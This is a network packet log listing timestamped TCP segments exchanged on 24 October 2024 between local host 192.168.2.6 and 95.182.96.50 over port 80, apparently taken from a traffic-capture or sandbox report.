Oct 24, 2024 13:54:23.375480890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375489950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375514984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375543118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375550985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375552893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375597000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375607967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375659943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375703096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375711918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375747919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375752926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375782967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375787020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375828981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375847101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375896931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375931978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375938892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375979900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376013994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376019001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376049042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376054049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376080036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376085997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376115084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376120090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376149893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376152992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376185894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376200914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376230001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376244068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376279116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376322031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376331091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376360893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376373053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376400948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376414061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376457930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376466990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376503944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376513004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376558065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376562119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376600027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376611948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376646042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376662016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376698971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376705885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376740932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376749992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376774073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376791000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376826048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376835108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376854897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376863956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376889944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376929045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376955986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376961946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.376991987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.376996994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377017975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377031088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377034903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377064943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377070904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377099991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377103090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377135038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377140999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377170086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377206087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377208948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377240896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377274990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377279997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377310991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377312899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377346039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377378941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377387047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377409935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377413034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377445936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377466917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377480984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377484083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377516031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377521992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377552032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377588987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377592087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377624035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377638102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377656937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377660036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377692938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377696991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377727032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377731085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377762079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377777100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377791882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377796888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377829075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377862930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377875090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377897024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377911091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377933025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.377933025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.377968073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.378000975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.378006935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.378034115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.378047943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.378067970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.378071070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.378103971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.378144026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.833694935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.839226961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.062932014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.062956095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.062975883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063008070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063009024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063024998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063041925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063060999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063072920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063083887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063090086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063107967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063111067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063124895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063136101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063143015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063147068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063160896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063167095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063184023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063191891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063198090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063208103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063224077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063234091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063241959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063255072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063273907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063357115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063374996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063390970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063399076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063407898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063424110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063424110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063435078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063441038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.063452959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063466072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.063481092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064110041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064158916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064364910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064400911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064405918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064419031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064445019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064449072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064460039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064467907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064485073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064491034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064503908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064512014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064522982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064539909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064547062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064558983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064579010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064587116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064604044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064629078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064631939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064649105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064654112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064666986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064676046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064683914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064691067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064701080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064712048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064718008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064729929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064743996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064747095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064760923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064764977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064783096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064783096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064801931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064819098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064832926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064842939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064843893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064843893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064855099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064861059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064876080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064878941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064896107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064898968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064912081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064912081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064929008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064933062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064944029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064944983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064961910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064975023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064975023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064980984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.064996004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.064997911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.065017939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.065017939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.065042019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.065049887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178489923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178512096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178529024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178567886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178572893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178600073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178601027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178617954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178627968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178637981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178642035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178657055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178662062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178684950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178687096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178703070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178704023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178720951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178731918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178735971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178742886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178752899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178762913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178771973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178781033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178797960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178811073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178841114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178857088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178872108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178883076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178888083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178894043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178905010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178915024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178921938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178934097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178937912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178949118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178955078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178965092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178972960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.178980112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.178998947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179016113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179097891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179114103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179127932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179142952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179148912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179158926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179169893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179174900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179192066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179194927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179205894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179219961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179251909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179474115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179501057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179517031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179532051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179543018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179548025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179557085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179564953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179580927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179584980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179596901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179609060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179617882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179631948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179642916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179656029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179660082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179682970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179687023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179692030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179702997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179719925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179723978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179735899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179739952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179752111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179754972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179769039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179773092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179785967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179796934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179805994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179816961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179832935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179835081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179851055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179852962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179862022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179867983 CEST	80	49714	95.182.96.50	192.168.2.6
